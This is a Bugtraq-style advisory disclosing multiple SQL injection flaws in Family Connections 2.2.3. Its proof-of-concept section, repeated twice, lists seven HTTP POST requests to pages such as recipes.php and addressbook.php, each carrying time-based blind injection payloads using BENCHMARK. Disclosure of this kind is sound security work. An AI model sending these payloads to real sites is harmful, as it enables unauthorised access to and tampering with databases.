Family Connections 2.2.3 Multiple SQL Injection Vulnerabilities
BID:40043
Info
Family Connections 2.2.3 Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 40043 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 10 2010 12:00AM |
| Updated: | May 10 2010 12:00AM |
| Credit: | Salvatore Fresta aka Drosophila |
| Vulnerable: |
Haudenschilt Family Connections 2.2.3 |
| Not Vulnerable: | |
Discussion
Family Connections 2.2.3 Multiple SQL Injection Vulnerabilities
Family Connections is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Family Connections 2.2.3 is vulnerable; other versions may also be affected.
Family Connections is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Family Connections 2.2.3 is vulnerable; other versions may also be affected.
Exploit / POC
Family Connections 2.2.3 Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following sample data is available:
POST /path/recipes.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/gallery/upload.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))
POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
Attackers can use a browser to exploit these issues.
The following sample data is available:
POST /path/recipes.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/gallery/upload.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))
POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
Solution / Fix
Family Connections 2.2.3 Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Family Connections 2.2.3 Multiple SQL Injection Vulnerabilities
References:
References:
- Family Connections Homepage (Family Connections)
- Family Connections 2.2.3 Multiple Remote Vulnerabilities (Salvatore Fresta aka Drosophila
)